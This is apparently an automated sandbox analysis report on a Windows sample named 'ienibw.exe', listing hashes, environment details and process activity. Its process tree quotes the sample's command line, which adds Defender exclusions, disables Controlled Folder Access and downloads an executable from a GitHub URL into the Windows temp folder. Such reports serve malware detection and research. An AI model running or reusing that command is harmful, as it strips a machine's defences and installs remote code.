1c018b3ee0e8ae77baaa646c0c3d7f7580d324272ecf0059e1e0f86b05bebb9f

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
08/03/2024, 11:27

Target

ienibw.exe
Size

17KB
MD5

e4c3264b4e41dee6ba8042cc86d09355
SHA1

08d3b768abbc7282498e3340ba887f6dbe7cc5f5
SHA256

1c018b3ee0e8ae77baaa646c0c3d7f7580d324272ecf0059e1e0f86b05bebb9f
SHA512

224f581ede0cebc3dddf371f075f0b8f5622cc17c9db1c2d2d081f9ec5b3a8d86e43d9d7a92df5fd202d7ae91acecb058b1a406586356a5323f0c28bf7bffd6b
SSDEEP

384:4TxyGi/1mtCD2Ucq5FKDXn4RFN3/38fGq8v:CCDUqKDXnoFN3/35

Score

1^/10

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1728 wrote to memory of 2468	1728	ienibw.exe	30
PID 1728 wrote to memory of 2468	1728	ienibw.exe	30
PID 1728 wrote to memory of 2468	1728	ienibw.exe	30

C:\Users\Admin\AppData\Local\Temp\ienibw.exe
"C:\Users\Admin\AppData\Local\Temp\ienibw.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Set-MpPreference -ExclusionExtension *.exe,*.ps1,*.dll; Set-MpPreference -EnableControlledFolderAccess Disabled; (new-object Net.WebClient).DownloadFile('https://github.com/anebgqa/b/releases/download/b/kmfk.exe', 'c:\windows\temp\srvc.exe');
  2⤵
  PID:2468